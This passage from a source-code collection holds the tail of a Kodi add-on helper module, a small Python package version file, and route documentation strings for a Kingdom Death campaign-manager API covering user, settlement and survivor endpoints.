        cMI.append(("Mark", run_plugin % _addon.build_plugin_url({'mode':'AddVisit','title':t,'site':site,'section':section})))
    return cMI
### ############################################################################################################
### ############################################################################################################
def refresh_meta(video_type,old_title,imdb,alt_id,year,new_title=''):
    """Interactively refresh metahandlers metadata for a movie or tvshow.

    Searches TheTVDB (tvshows) or the movie search (movies) for
    new_title (falling back to old_title), shows a selection dialog
    whose first entry is 'Manual Search...', then updates the cached
    meta and refreshes the container.  Silently returns when the
    metahandlers module is unavailable.
    """
    try: from metahandler import metahandlers
    except: return
    __metaget__=metahandlers.MetaData()
    if new_title: search_title=new_title
    else: search_title=old_title
    if video_type=='tvshow':
        # TheTVDB results are (tvdb_id, title, imdb_id) tuples; normalize
        # them into the same dict shape search_movies() returns.
        api=metahandlers.TheTVDB(); results=api.get_matching_shows(search_title); search_meta=[]
        for item in results: option={'tvdb_id':item[0],'title':item[1],'imdb_id':item[2],'year':year}; search_meta.append(option)
    else: search_meta=__metaget__.search_movies(search_title)
    debob(search_meta); #deb('search_meta',search_meta);
    option_list=['Manual Search...']
    for option in search_meta:
        if 'year' in option: disptitle='%s (%s)' % (option['title'],option['year'])
        else: disptitle=option['title']
        option_list.append(disptitle)
    dialog=xbmcgui.Dialog(); index=dialog.select('Choose',option_list)
    # index 0 is the manual-search sentinel; -1 means the dialog was cancelled.
    if index==0: refresh_meta_manual(video_type,old_title,imdb,alt_id,year)
    elif index > -1:
        # NOTE(review): new_imdb_id is computed but never passed to
        # update_meta below (the original imdb is used) -- confirm intent.
        new_imdb_id=search_meta[index-1]['imdb_id']
        #Temporary workaround for metahandlers problem:
        #Error attempting to delete from cache table: no such column: year
        if video_type=='tvshow': year=''
        try: _1CH.log(search_meta[index-1])
        except: pass
        __metaget__.update_meta(video_type,old_title,imdb,year=year); xbmc.executebuiltin('Container.Refresh')
def refresh_meta_manual(video_type,old_title,imdb,alt_id,year):
    """Prompt for a title with the on-screen keyboard, then re-run refresh_meta with it."""
    if year:
        disptitle = '%s (%s)' % (old_title, year)
    else:
        disptitle = old_title
    keyboard = xbmc.Keyboard()
    keyboard.setHeading('Enter a title')
    keyboard.setDefault(disptitle)
    keyboard.doModal()
    if keyboard.isConfirmed():
        refresh_meta(video_type, old_title, imdb, alt_id, year, keyboard.getText())
### ############################################################################################################
### ############################################################################################################
def DoE(e):
    """Execute the given XBMC built-in command string.

    Bug fix: the original passed the undefined global ``E`` instead of
    the ``e`` parameter (raising NameError on every call); the sibling
    DoA() below shows the intended pattern.
    """
    xbmc.executebuiltin(e)
def DoA(a):
    """Send an Action(<a>) built-in command to XBMC (e.g. DoA('Back'))."""
    command = "Action(%s)" % a
    xbmc.executebuiltin(command)
### ############################################################################################################
### ############################################################################################################
| [
"ke.xiao@netxeon.com"
] | ke.xiao@netxeon.com |
ca2fa5ad4997c54d0f3874f400a20a3fbfbdaf02 | ccbe341f4bc5f46ce31968a1d764a87f6f6803a8 | /pytheas/__init__.py | 49bf2edb9ecbfe446b859aa5cdeb805ed037f51e | [
"MIT"
] | permissive | skytreader/pytheas | 8ce1e23965c61aff5eb48a301e9a8e04d3c70a55 | c41cf985827734a1a9be1e61a93fca2a7b14c3d9 | refs/heads/master | 2023-04-09T01:54:24.423483 | 2014-06-03T04:04:35 | 2014-06-03T04:04:35 | 17,976,330 | 0 | 0 | null | 2023-03-31T14:38:58 | 2014-03-21T10:30:38 | Python | UTF-8 | Python | false | false | 156 | py | # Copied from https://github.com/andymccurdy/redis-py/blob/master/redis/__init__.py
# Package version metadata; VERSION mirrors __version__ as an int tuple
# so callers can do ordered comparisons.
__version__ = "0.1.2"
VERSION = tuple(int(part) for part in __version__.split("."))
| [
"chadestioco@gmail.com"
] | chadestioco@gmail.com |
9bad8400dbafa3c00fcaf4ba4085dc262f62207b | 7b3743f052da9a74808b7d2145418ce5c3e1a477 | /v2/api.thewatcher.io/api/docs/private.py | 5f68768247fe15338ab8d818e23743055fb70ded | [
"MIT"
] | permissive | quebecsti/kdm-manager | 5547cbf8928d485c6449650dc77805877a67ee37 | a5fcda27d04135429e43a21ac655e6f6acc7768e | refs/heads/master | 2020-11-26T19:22:53.197651 | 2019-10-22T20:53:40 | 2019-10-22T20:53:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,331 | py | authorization_token_management = {
"authorization_check": {
"name": "/authorization/check",
"desc": """\
<p><b>GET</b> or <b>POST</b> to this endpoint to determine if your Authorization
header is still valid or if it has expired.</p>""",
},
"authorization_refresh": {
"name": "/authorization/refresh",
"desc": """\
<p> Use the standard 'Authorization' header and <b>POST</b> an empty request to
this route to recieve a new Auth token based on the previous one.</p>
<p> On the back end, this route reads the incoming 'Authorization' header and,
even if the JWT token is expired, will check the 'login' and 'password' (hash)
keys: if they check out, you get a 200 and a brand new token.</p>
<p> Finally, the KDM API does NOT use refresh tokens (it just feels like
overkill, you know?).</p>\
"""
},
}
# Route-documentation metadata: each entry maps a doc handle to the route
# name, allowed HTTP methods and an HTML 'desc' fragment rendered on the
# API documentation page.
administrative_views_and_data = {
    "admin_view_panel": {
        "name": "/admin/view/panel",
        "methods": ["GET","OPTIONS"],
        "desc": """\
<p>Access the API Admin panel. Uses HTTP basic auth (no cookies/no sessions)
and requires a user have the 'admin' bit flipped on their user.</p>
""",
    },
    "admin_get_user_data": {
        "name": "/admin/get/user_data",
        "methods": ["GET","OPTIONS"],
        "desc": """\
<p>Retrieves a nice, juicy hunk of JSON re: recent users of the API.</p>
""",
    },
    "admin_get_logs": {
        "name": "/admin/get/logs",
        "methods": ["GET","OPTIONS"],
        "desc": """\
<p>Dumps the contents of a number of system logs from the local filesystem where
the API is running and represents them as JSON.</p>
""",
    },
    }
user_management = {
"user_get": {
"name": "/user/get/<user_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>Retrieve a serialized version of the user who owns <user_id>,
to include some additional usage and meta facts about that user.</p>
<p>Like many of the <code><b>GET</b></code> routes supported by the KD:M API,
this route will return user info whether you use <code><b>POST</b></code> or
any other supported method.</p>
""",
},
"user_dashboard": {
"name": "/user/dashboard/<user_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>This fetches a serialized version of the user that includes the
<code>/world</code> output as well as a bunch of info about the
user, including their friends, settlements they own or are
playing in, etc.</p>
<p>Here's a run-down of the key elements:</p>
<pre><code>{
"is_application_admin": true,
"meta": {...},
"user": {...},
"preferences": [...],
"dashboard": {
"campaigns": [...],
"settlements": [...],
},
}</code></pre>
<p>The top-level <code>dashboard</code> element includes two arrays:
<code>campaigns</code> and <code>settlements</code>.</p>
<p>The <code>campaigns</code> array is a <b>reverse-chronological</b> list
of OIDs of all settlements where the user owns a survivor (i.e.
the survivor's <code>email</code> attribute matches the users
<code>login</code> attribute.</p>
<p>This list can include settlements owned/created by other users:
the basic idea behing the <code>campaigns</code> list is that
you probably want to show these settlements to the user when they
sign in or when they choose which settlement they want to view.</p>
<p>The <code>campaigns</code> array <u>does not</u> include any
'abandoned' settlements (i.e. any settlement with a Boolean True
value for the <code>abandoned</code> attribute.</p>
<p>See <a href="/#settlementAbandon"><code>/settlement/abandon/oid</code>
(below)</a> for more on abandoning a settlement. </p>
<p>Conrastively, the <code>settlements</code> array is a
<b>chronologically</b> sorted list of all settlement OIDs that belong
to the current user, whether abandoned or not.</p>
<p>This is more of an archival/historical sort of list, meant to
facilitate that kind of view/list/UX.</p>
""",
},
"user_set": {
"name": "/user/set/<user_id>",
"subsection": "user_attribute_management",
"desc": """\
<p>This route supports the assignment of user-specified key/value
attributes to the user object.</p><p>To set an attribute, include
JSON in the body of the request that indicates the key/value to set.</p>
Supported attribute keys include:
<table class="embedded_table">
<tr><th>key</th><th>value</th></tr>
<tr>
<td>current_settlement</td>
<td class="text">
OID of an existing,non-removed settlement.
</td>
</tr>
</table>
Use multiple key/value pairs to set multiple attributes in a single
request, e.g. <code>{"current_settlement": $oid, "current_session":
$oid}</code>
</p>
<p><b>Important!</b> This route does not support the assignment of
arbitrary keys and will completely fail any request that includes
unsupported keys!</p>
""",
},
"user_set_preferences": {
"name": "/user/set_preferences/<user_id>",
"subsection": "user_attribute_management",
"desc": """\
<p><b>POST</b> a list of hashes to this endpoint to set user preferences.</p>
<p>Your list has to be named <code>preferences</code> and your
hashes have to be key/value pairs where they key is a valid
preferences handle and the key is a Boolean:</p>
<code>{preferences: [{handle: "beta", value: true}, {...}]}</code>
<p>Since this is mostly a sysadmin/back-of-house kind of route,
it fails pretty easily if you try to <b>POST</b> something it doesn't
like. The good news, is that it should fail pretty descriptively.</p>
""",
},
"user_add_expansion_to_collection": {
"name": "/user/add_expansion_to_collection/<user_id>",
"subsection": "user_collection_management",
"desc": """\
<p>You can <b>POST</b> a single expansion handle to this endpoint
to add it to a user's collection of expansions:</p>
<code>{handle: "manhunter"}</code>
""",
},
"user_rm_expansion_from_collection": {
"name": "/user/rm_expansion_from_collection/<user_id>",
"subsection": "user_collection_management",
"desc": """\
<p><b>POST</b> some basic JSON to this endpoint to remove an expansion handle
from a user's collection:</p>
<code>{handle: "flower_knight"}</code>
""",
},
}
# API documentation metadata for the asset-creation endpoints
# (/new/settlement, /new/survivor, /new/survivors). Each entry maps a doc
# handle to a dict with the route 'name', its allowed HTTP 'methods', and an
# HTML 'desc' blob that is rendered verbatim on the public docs page.
create_assets = {
    "new_settlement": {
        "name": "/new/settlement",
        "methods": ["POST","OPTIONS"],
        "desc": """\
<p>Use 'handle' values from the <code>/game_asset/new_settlement</code>
route (see above) as params, like this:</p>
<code><pre>{
    "campaign": "people_of_the_lantern",
    "expansions": ["dung_beetle_knight", "lion_god"],
    "survivors": ["adam", "anna"],
    "name": "Chicago",
    "special": ["create_first_story_survivors"]
}</pre></code>
<p>If successful, this route returns a serialized version of the new settlement,
including its OID, as JSON.</p>
<p>The following <code>special</code> values are supported by the API:</p>
<table class="embedded_table">
    <tr><th>value</th><th>result</th></tr>
    <tr>
        <td class="key">create_first_story_survivors</td>
        <td class="value">Creates two male and two female survivors,
        assigns them names and places Founding Stones and Cloths in
        Settlement Storage.</td>
    </tr>
    <tr>
        <td class="key">create_seven_swordsmen</td>
        <td class="value">Creates seven random survivors with the
        'Ageless' and Sword Mastery A&Is. </td>
    </tr>
</table>
<p><b>Important!</b> Unsupported <code>special</code> values are ignored.</p>\
""",
    },
    "new_survivor": {
        "name": "/new/survivor",
        "methods": ["POST", "OPTIONS"],
        # NOTE: an earlier revision of this desc repeated the
        # conditional-inheritance paragraphs twice (the first copy with an
        # OID example broken across two lines); the duplicate was removed.
        "desc": """\
<p>This works differently from <code>/new/settlement</code> in
a number of significant ways.</p>
<p> In a nutshell, the basic idea here is that the only required key
in the JSON you <b>POST</b> to this route is an object ID for the settlement
to which the survivor belongs:</p>
<code>{'settlement': '59669ace4af5ca799c968c94'}</code>
<p> Beyond that, you are free to supply any other attributes of the
survivor, so long as they comply with the data model for survivors.</p>
<p> Consult the <a href="/#survivorDataModel">Survivor Data Model (below)</a> for a
complete reference on what attributes of the survivor may be set at
creation time.</p>
<p>As a general piece of advice, it typically makes more sense to
just initialize a new survivor with defaults and then operate on it
using the routes below, unless you're doing something with inheritance.</p>
<p>For normal inheritance, simply <b>POST</b> the OID's of one or
more of the survivor's parents like so:</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff'}</code>
<p>...or like so:</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff', mother: '5a3419c64af5ca11240f519f'}</code>
<p>This will cause normal inheritance rules to be triggered when the
new survivor is created.</p>
<p>In order to trigger conditional or special inheritance, e.g. where
an innovation requires the user to select a single parent as the donor,
you <u>must</u> specify which parent is the donor using the <code>
primary_donor_parent</code> key and setting it to 'father' or 'mother':</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff', mother: '5a3419c64af5ca11240f519f', primary_donor_parent: 'father'}</code>
<p>This will cause innovations such as <b>Family</b> to use the primary
donor parent to follow one-parent inheritance rules for that innovation.</p>
<p>As of API releases > 0.77.n, survivors can be created with an avatar.
Include the <code>avatar</code> key in the <b>POST</b> body, and let
that key's value be a string representation of the image that should
be used as the survivor's avatar.</p>
<p>(<a href="/#setAvatarAnchor">See <code>/survivor/set_avatar/<oid></code> route below</a> for more
information on how to post string representations of binary content.)</p>
<p><b>Important!</b>Just like the <code>/new/settlement</code> route,
a successful <b>POST</b> to the <code>/new/survivor</code> route will return
a serialized version (i.e. JSON) of the new survivor, complete with
the <code>sheet</code> element, etc.</p>
""",
    },
    "new_survivors": {
        "name": "/new/survivors",
        "methods": ["POST", "OPTIONS"],
        "desc": """\
<p>Not to be confused with <code>/new/survivor</code> (above),
this route adds multiple new survivors, rather than just one.</p>
<p>The JSON you have to <b>POST</b> to this route is a little different
and more limited than what you would post to <code>/new/survivor</code>.</p>
<p>The following <b>POST</b> key/value pairs are the only ones supported
by this route:</p>
<table class="embedded_table">
    <tr><th>key</th><th>O/R</th><th>value type</th><th>comment</th>
    <tr>
        <td>settlement_id</td>
        <td><b>R</b></td>
        <td>settlement OID</td>
        <td class="text">The OID of the settlement to which the new survivors belong.</td>
    </tr>
    <tr>
        <td>public</td>
        <td>O</td>
        <td>boolean</td>
        <td class="text">
            The value of the new survivors'<code>public</code> attribute.
            Defaults to <code>true</code>.
        </td>
    </tr>
    <tr>
        <td>male</td>
        <td>O</td>
        <td>arbitrary int</td>
        <td class="text">The number of male survivors to create.</td>
    </tr>
    <tr>
        <td>female</td>
        <td>O</td>
        <td>arbitrary int</td>
        <td class="text">The number of female survivors to create.</td>
    </tr>
    <tr>
        <td>father</td>
        <td>O</td>
        <td>survivor OID</td>
        <td class="text">The OID of the survivor that should be the father of the new survivors.</td>
    </tr>
    <tr>
        <td>mother</td>
        <td>O</td>
        <td>survivor OID</td>
        <td class="text">The OID of the survivor that should be the mother of the new survivors.</td>
    </tr>
</table>
<p>Creating new survivors this way is very simple. This JSON, for
example, would create two new male survivors:</p>
<code>{"male": 2, "settlement_id": "5a1485164af5ca67035bea03"}</code>
<p>A successful <b>POST</b> to this route always returns a list of
serialized survivors (i.e. the ones that were created), so if
you are creating more than four or five survivors, this route is
a.) going to take a couple/few seconds to come back to you and b.)
is going to drop a pile of JSON on your head. YHBW.</p>
<p>NB: this route <i>does not</i> support random sex assignment.</p>
""",
    },
}
settlement_management = {
"settlement_get_settlement_id": {
"name": "/settlement/get/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p> Retrieve a serialized version of the settlement associated
with <settlement_id> (to include all related user and game
assets, including survivors).</p>
<p><b>Important!</b> Depending on the number of expansions, survivors,
users, etc. involved in a settlement/campaign, this one can take a
long time to come back (over 2.5 seconds on Production hardware).
YHBW</p>
""",
},
"settlement_get_summary_settlement_id": {
"name": "/settlement/get_summary/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>Get a nice, dashboard-friendly summary of a settlement's info.</p>
<p>This route is optimized for speedy returns, e.g. the kind you want when
showing a user a list of their settlements.</p>
""",
},
"settlement_get_campaign_settlement_id": {
"name": "/settlement/get_campaign/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>Retrieve a serialized version of the settlement where the
<code>user_assets</code> element includes the <code>groups</code>
list, among other things, and is intended to be used in creating
'campaign' type views.</p>
<p>Much like the big <code>get</code> route for settlements, this one
can take a while to come back, e.g. two or more seconds for a normal
settlement. YHBW.</p>
""",
},
"settlement_get_sheet_settlement_id": {
"name": "/settlement/get_sheet/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>A convenience endpoint that only returns the settlement's <code>sheet</code>
element, i.e. the dictionary of assets it owns.</p>
""",
},
"settlement_get_game_assets_settlement_id": {
"name": "/settlement/get_game_assets/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>A convenience endpoint that only returns the serialized settlement's <code>
game_assets</code> element, i.e. the JSON representation of the game assets
(gear, events, locations, etc.) required to represent the settlement. </p>
""",
},
"settlement_get_event_log_settlement_id": {
"name": "/settlement/get_event_log/<settlement_id>",
"subsection": "settlement_component_gets",
"desc": """\
<p><b>GET</b> this end point to retrieve all settlement event log
entries (in a giant hunk of JSON) in <u>reverse chronological
order</u>, i.e. latest first, oldest last.</p>
<p>PROTIP: For higher LY settlements this can be a really huge
list and take a long time to return: if you're a front-end
developer, definitely consider loading this one AFTER you have
rendered the rest of your view.</p>
<p>Another way to optimize here is to include a filter key/value
pair in your <b>POST</b> body to limit your results. Some of the
accepted filter params will decrease the time it takes for your
requested lines to come back from the API:
<table class="embedded_table">
<tr><th>key</th><th>value type</th><th>scope</th>
<tr>
<td>lines</td>
<td>arbitrary int</td>
        <td class="text">Limit the return to the last <code>lines</code>-worth of lines: <code>{lines: 10}</code>. Note that this <u>does not</u> make the query or the return time better or faster for settlements with large event logs.</td>
</tr>
<tr>
<td>ly</td>
<td>arbitrary int</td>
<td class="text">
Limit the return to event log lines created <u>during</u> an arbitrary Lantern Year, e.g. <code>{ly: 9}</code>.<br/>
Note:
<ul class="embedded">
<li>This will always return <i>something</i> and you'll get an empty list back for Lantern Years with no events.</li>
<li>This param triggers a performance-optimized query and will return faster than a general call to the endpoint with no params.</li>
</ul>
</tr>
<tr>
<td>get_lines_after</td>
<td>event log OID</td>
        <td class="text">Limit the return to event log lines created <u>after</u> an event log OID: <code>{get_lines_after: "5a0370b54af5ca4306829050"}</code></td>
</tr>
<tr>
<td>survivor_id</td>
<td>arbitrary survivor's OID</td>
<td class="text">Limit the return to event log lines that are tagged with a survivor OID: <code>
{survivor_id: "5a0123b54af1ca42945716283"}</code></td>
</tr>
</table>
<p><b>Important!</b> Though the API will accept multiple filter
params at this endpoint, <b>POST</b>ing more than one of the
above can cause...unexpected output. YHBW.</p>
""",
},
"settlement_get_storage_settlement_id": {
"name": " /settlement/get_storage/<settlement_id>",
"methods": ['GET','OPTIONS'],
"subsection": "settlement_component_gets",
"desc": """\
<p>Hit this route to get representations of the settlement's storage.</p>
<p>What you get back is an array with two dictionaries, one for resources
and one for gear:</p>
<pre><code>[
{
"storage_type": "resources",
"total":0,
"name":"Resource",
"locations": [
{
"bgcolor":"B1FB17",
"handle":"basic_resources",
"name":"Basic Resources",
"collection": [
{
"handle":"_question_marks",
"name":"???",
"rules":[],
"consumable_keywords": ["fish","consumable","flower"],
"type_pretty": "Resources",
"keywords": ["organ","hide","bone","consumable"],
"desc":"You have no idea what monster bit this is. Can be used as a bone, organ, or hide!",
"type":"resources",
"sub_type":"basic_resources",
"quantity":0,"flippers":false
},
...
],
...
},
},
], </pre></code>
<p>This JSON is optimized for representation via AngularJS, i.e. iteration over
nested lists, etc.</p>
<p>Each dictionary in the main array has an array called <code>locations</code>,
which is a list of dictionaries where each dict represents a location within the
settlement.</p>
<p>Each location dictionary has an array called <code>collection</code> which is
a list of dictionaries where each dictionary is a piece of gear or a resource.</p>
<p>The attributes of the dictionaries within the <code>collection</code> array
include the <code>desc</code>, <code>quantity</code>, etc. of an individual
game asset (piece of gear or resource or whatever).</p>
""",
},
"settlement_abandon_settlement_id": {
"name": "/settlement/abandon/<settlement_id>",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p>Hit this route with a <b>POST</b> to mark the settlement as abandoned.</p>
<p>Your <b>POST</b> does not need to contain anything (but it does need
to be a <b>POST</b> (<b>GET</b> requests will not abandon the settlement.</p>
<p>An abandoned settlement has a date/time stamp of when it was
abandoned as its <code>abandoned</code> attribute and you can use this in your
UI to separate it out from active settlements.</p>
""",
},
"settlement_remove_settlement_id": {
"name": "/settlement/remove/<settlement_id>",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p><b>POST</b> (not <b>GET</b>) to this route to mark the settlement as
removed.</p>
<p>Once marked as removed, settlements are queued up by the API for removal
from the database: the next time the maintenance process runs, it will check
the timestap of the mark as removed event and purge the settlement
(and all survivors) from the database.</p>
<p><b>This cannot be undone.</b></p>
""",
},
#
# settlement SET attributes
#
"settlement_set_last_accessed_settlement_id": {
"name": "/settlement/set_last_accessed/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>This endpoint allows you to set the settlement's <code>last_accessed</code>
attribute, which is used in dashboard reporting, etc. </p>
<p><b>POST</b>ing an empty JSON payload to this will cause the settlement's
<code>last_accessed</code> value to be set to now.</p>
""",
},
"settlement_set_name_settlement_id": {
"name": "/settlement/set_name/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p><b>POST</b> some JSON whose body contains the key 'name' and whatever the
new name is going to be as that key's value to change the settlement's
name:</p>
<code>{'name': 'The Black Lantern'}</code>
<p><b>Important!</b> Submitting an empty string will cause the API to
default the settlement's name to "UNKNOWN". There are no technical
reasons (e.g. limitations) for this, but it breaks the display in most
client apps, so null/empty names are forbidden.</p>
""",
},
"settlement_set_attribute_settlement_id": {
"name": "/settlement/set_attribute/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p><b>POST</b> some basic JSON containing an 'attribute' and a 'value'
key where 'attribute' is an integer settlement attrib and 'value' is
the new value:</p>
<code>{'attribute': 'survival_limit', 'value': 3}</code>
<p> This route also supports incrementing the <code>population</code>
and <code>death_count</code> attributes. </p>
""",
},
"settlement_set_inspirational_statue_settlement_id": {
"name": "/settlement/set_inspirational_statue/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>Set the settlement's <code>inspirational_statue</code> attrib
by <b>POST</b>ing a Fighting Art handle to this route:</p>
<code>{'handle': 'leader'}</code>
<p>This route will actually check out the handle and barf on you
if you try to <b>POST</b> an unrecognized FA handle to it. YHBW.</p>
""",
},
"settlement_set_lantern_research_level_settlement_id": {
"name": "/settlement/set_lantern_research_level/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>Set the Settlement's Lantern Research Level with some basic
JSON:</p>
<code>{'value': 3}</code>
<p>This route is preferable to a generic attribute setting route
because it a.) ignores values over 5 and b.) forces the attrib,
which is not part of the standard data model, to exist if it does
not.</p>
<p>Definitely use this instead of <code>set_attribute</code>.</p>
""",
},
"settlement_update_set_lost_settlements_settlement_id": {
"name": "/settlement/set_lost_settlements/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>Use this route to set a settlement's Lost Settlements total.</p>
<p><b>POST</b> some JSON containing the new value to set it to:</p>
<code>{"value": 2}</code>
<p>The above code would set the settlement's Lost Settlements total
to two; negative numbers will default to zero. </p>
""",
},
#
# settlement UPDATE attributes
#
"settlement_update_attribute_settlement_id": {
"name": "/settlement/update_attribute/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p><b>POST</b> some JSON containing an 'attribute' and a 'modifier'
key where 'attribute' is an integer settlement attrib and 'mofier' is
how much you want to increment it by:</p>
<code>{'attribute': 'death_count', 'modifier': -1}</code>
<p> This route also supports incrementing the <code>survival_limit
</code> and <code>death_count</code> routes.</p>
""",
},
"settlement_update_population_settlement_id": {
"name": "/settlement/update_population/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p><b>POST</b> some JSON containing the key 'modifier' whose value is
an integer that you want to add to the settlement's population
number.<p>
<p>This works basically identically to the <code>update_attribute</code>
route, so considering using that route instead. </p>
<p>For example, this JSON would add two to the settlement's
population number:</p>
<code>{'modifier': 2}</code>
<p><b>POST</b> negative numbers to decrease.</p>
<p><b>Important!</b> Settlement population can never go below zero,
so any 'modifier' values that would cause this simply cause the
total to become zero.</p>\
""",
},
"settlement_replace_game_assets_settlement_id": {
"name": "/settlement/replace_game_assets/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p>This route functions nearly identically to the other update-type routes in
this subsection, except for one crucial difference: it works on list-type
attributes of the settlement (whereas the others mostly work on string or
integer type attributes).</p>
<p>This route accepts a list of <code>handles</code> and a <code>type</code>
of game asset and then evalutes the settlement's current handles of that type,
removing and adding as necessary in order to bring the settlement's list in sync
with the incoming list. </p>
<p>Your POST body needs to define the attribute <code>type</code>
you're trying to update, as well as provide a list of handles
that represent the settlement's current asset list:</p>
<pre><code>{
"type": "locations",
"handles": [
"lantern_hoard","bonesmith","organ_grinder"
]
}</code></pre>
<p>Finally, a couple of tips/warnings on this route:<ul>
<li>The <code>handles</code> list/array is handled by the API as if it were a set, i.e. duplicates are silently ignored.</li>
<li>If any part of the update fails (i.e. individual add or remove operations), the whole update will fail and <u>no changes to the settlement will be saved</u>.</li>
<li>This route does not support Location or Innovation levels! (Use <code>set_location_level</code> or <code>set_innovation_level</code> for that.)</li>
</ul></p>
""",
},
"settlement_update_endeavor_tokens_settlement_id": {
"name": "/settlement/update_endeavor_tokens/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p>Use this route to change a settlement's endeavor token count.</p>
<p><b>POST</b> some JSON containing the number to modify by:</p>
<code>{"modifier": 2}</code>
<p>The above code would add two to the settlement's current total,
whereas the code below would decrement by one:</p>
<code>{"modifier": -1}</code>
""",
},
"settlement_update_toggle_strain_milestone_settlement_id": {
"name": "/settlement/toggle_strain_milestone/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p>You may <b>POST</b> some JSON containing the key <code>handle</code>
and the value of a strain milestone handle to toggle that strain
milestone on or off for the settlement:</p>
<code>{"handle": "ethereal_culture_strain"}</code>
<p>The API will fail if unknown <code>handle</code> values are <b>POST</b>ed.</p>
""",
},
#
# bulk survivor management
#
"settlement_update_survivors_settlement_id": {
"name": "/settlement/update_survivors/<settlement_id>",
"subsection": "settlement_manage_survivors",
"desc": """\
<p>Use this route to update a specific group of survivors, e.g.
Departing survivors.</p>
<p><b>POST</b> some JSON including the type of survivors to include,
the attribute to modify, and the modifier:</p>
<code>{include: 'departing', attribute: 'Insanity', modifier: 1}</code>
<p><b>Important!</b> This route currently only supports the
<code>include</code> value 'departing' and will error/fail/400 on
literally anything else.</p>\
""",
},
#
# settlement: manage expansions
#
"settlement_update_add_expansions_settlement_id": {
"name": "/settlement/add_expansions/<settlement_id>",
"subsection": "settlement_manage_expansions",
"desc": """\
<p>Add expansions to a settlement by <b>POST</b>ing a list of expansion handles.
The body of your post should be a JSON-style list:</p>
<code>{'expansions': ['beta_challenge_scenarios','dragon_king']}</code>
<p>
Note that this route not only updates the settlement sheet, but also
adds/removes timeline events, updates the settlement's available game
assets (e.g. items, locations, etc.).
</p>
""",
},
"settlement_update_rm_expansions_settlement_id": {
"name": "/settlement/rm_expansions/<settlement_id>",
"subsection": "settlement_manage_expansions",
"desc": """\
<p>Remove expansions from a settlement by <b>POST</b>ing a list of
expansion handles. The body of your post should be a JSON-style
list:</p>
<code>{'expansions': ['manhunter','gorm','spidicules']}</code>
<p>
Note that this route not only updates the settlement sheet, but also
adds/removes timeline events, updates the settlement's available game
assets (e.g. items, locations, etc.).
</p>
<p><b>Important!</b> We're all adults here, and the KDM API will
<i>not</i> stop you from removing expansion handles for expansions
that are required by your settlement's campaign. If you want to
prevent users from doing this, that's got to be part of your UI/UX
considerations.</p>
""",
},
#
# settlement: manage monsters
#
"settlement_set_current_quarry_settlement_id": {
"name": "/settlement/set_current_quarry/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p>This route sets the settlement's 'current_quarry' attribute,
which is the monster that the settlement's Departing Survivors are
currently hunting.</p><p><b>POST</b> some simple JSON containing a monster
name (do not use handles for this):</p>
<code>{'current_quarry': 'White Lion Lvl 2'}</code>
<p>...or, the monster is unique:</p>
<code>{'current_quarry': 'Watcher'}</code>
<p><b>Important!</b> You're typically going to want to pull monster
names from the settlements' <code>game_assets -> defeated_monsters</code>
list (which is a list of monster names created for the settlement
based on expansion content, etc.)</p>
""",
},
"settlement_add_defeated_monster_settlement_id": {
"name": "/settlement/add_defeated_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p><b>POST</b> a 'monster' string to this route to add it to the
settlement's list of defeated monsters:</p>
<code>{'monster': 'White Lion (First Story)}</code> or
<code>{'monster': 'Flower Knight Lvl 1'}</code>
<p><b>Important!</b> Watch the strings on this one and try to avoid
free text: if the API cannot parse the monster name and match it to
a known monster type/name, this will fail.</p>
""",
},
"settlement_rm_defeated_monster_settlement_id": {
"name": "/settlement/rm_defeated_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p><b>POST</b> a 'monster' string to this route to remove it from the
settlement's list of defeated monsters, i.e. the <code>sheet.defeated_monsters</code>
array/list: </p>
<code>{'monster': 'Manhunter Lvl 4'}</code>
<p>Attempts to remove strings that do NOT exist in the list will
not fail (i.e. they will be ignored and fail 'gracefully').</p>
""",
},
"settlement_add_monster_settlement_id": {
"name": "/settlement/add_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<P>Use this route to add quarry or nemesis type monsters to the
settlement. <b>POST</b> some JSON containing the handle of the monster to
add it:</p>
<code>{'handle': 'flower_knight'}</code>
<p>The API will determine whether the monster is a nemesis or a quarry
and add it to the appropriate list. For nemesis monsters, use the
<code>/settlement/update_nemesis_levels</code> route (below) to manage
the checked/completed levels for that nemesis.</p>
<p>Make sure to check the settlement JSON <code>game_assets.monsters</code>
and use the correct handle for the desired monster.</p>
""",
},
"settlement_rm_monster_settlement_id": {
"name": "/settlement/rm_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p><b>POST</b> some JSON containing a quarry or nemesis type monster handle
to remove it from the settlement's list:</p>
<code>{'handle': 'sunstalker'}</code>
<p>The API will determine whether the monster is a quarry or a nemesis.
When a nemesis monster is removed, its level detail is also removed.</p>
""",
},
"settlement_update_nemesis_levels_settlement_id": {
"name": "/settlement/update_nemesis_levels/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
